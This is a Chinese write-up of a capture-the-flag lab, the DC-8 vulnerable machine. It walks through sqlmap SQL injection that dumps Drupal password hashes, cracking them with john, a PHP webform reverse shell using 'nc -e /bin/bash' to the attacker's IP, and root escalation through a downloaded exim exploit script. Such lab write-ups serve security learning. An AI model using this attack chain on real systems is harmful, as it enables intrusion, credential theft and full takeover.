码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • DC-8靶场下载及渗透实战详细过程(DC靶场系列)


    目录

    一. 信息收集

    1. 主机扫描

    2. 端口扫描

    3. 目录扫描

    4. 页面探测

    二. 渗透过程

    1. SQL注入

    2. 爆破密文

    3. 反弹shell

    4. 提权

    5. 找查flag


     DC-8靶场下载地址https://www.five86.com/downloads/DC-8.zip

    一. 信息收集

    1. 主机扫描

    2. 端口扫描

    3. 目录扫描

    dirsearch -u 192.168.120.143 -e * -x 403 --random-agent

    4. 页面探测

    又是Drupal

    确认Drupal版本7.67,该版本网上找不到漏洞,但是有源码,额,总不会让我们去挖这个的漏洞吧!?

    探索发现,以前点那啥蓝色字体的时候会转跳到Drupal的官方,而这里就只加了参数nid,非常可疑,可能存在有SQL注入、xss等漏洞

    二. 渗透过程

    1. SQL注入

    在nid参数后面加'

    出现了SQL报错,接下来就上SQLmap跑了,爆一下数据库

    sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch --current-db

    爆表

    sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -tables

    有一堆表,但是有用的只有users,接着爆字段名

    sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -columns

    接着看字段

    sqlmap -u "http://192.168.120.143/?nid=1" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C'name,pass,uid' -dump

    得到了两个用户,还有hash密文,我们建一个文件,将两个密文保存起来

    2. 爆破密文

    Drupal的hash密文是经过特殊加密的,用john进行爆破

    john hash.txt

    爆破出了一个密码turtle

    3. 反弹shell

    测试发现是john的密码,在/user/login处登入,探索发现在WEBFORM处可以编辑并执行PHP代码

    不多bb,直接写入反弹shell

    1. exec("nc -e /bin/bash 192.168.120.129 6666");
    2. ?>

    将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码

    反弹shell成功!

    4. 提权

    找查一下suid权限的二进制文件

    find / -perm -4000 -print 2>/dev/null

    之前的DC靶场机exim4提权都失败了,这里再试一下,先看一下版本

    exim --version

    exim 4.89

    接着找一下漏洞

    searchsploit exim 4 

    复制一下文件

    cp /usr/share/exploitdb/exploits/linux/local/46996.sh hack.sh  

    开启http服务

    python -m http.server 8888 

    在DC-7中下载该文件,先跳到tmp目录

    1. cd /tmp
    2. wget 192.168.120.129:8888/hack.sh

    接着查看一下文件权限

    ls -la

    可以看到文件是不可执行的,我们可以用chmod命令赋予执行权限

    chmod 777 hack.sh

    接着根据sh脚本提示,执行文件

    ./hack.sh -m netcat

     提权成功,有点奇怪就是过一会root权限就消失了,所以动作要快

    5. 找查flag

    在root目录下发现flag文件

    拿到flag!!!

  • 相关阅读:
    PowerDotNet平台化软件架构设计与实现系列(13):应用监控平台
    Java导出请求头
    使用VScode SSH公网远程连接本地服务器开发【无公网IP内网穿透】
    Vue安装插件时候中遇到冲突依赖解决方案
    可执行文件以管理员身份运行
    Web 前端 || 和 &&运算符判定规则和常用法
    项目开展CICD的实践探路
    面渣逆袭:RocketMQ二十三问
    LeetCode102.二叉树的层序遍历
    【Java 进阶篇】Ajax 入门:打开前端异步交互的大门
  • 原文地址:https://blog.csdn.net/l2872253606/article/details/126062437
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号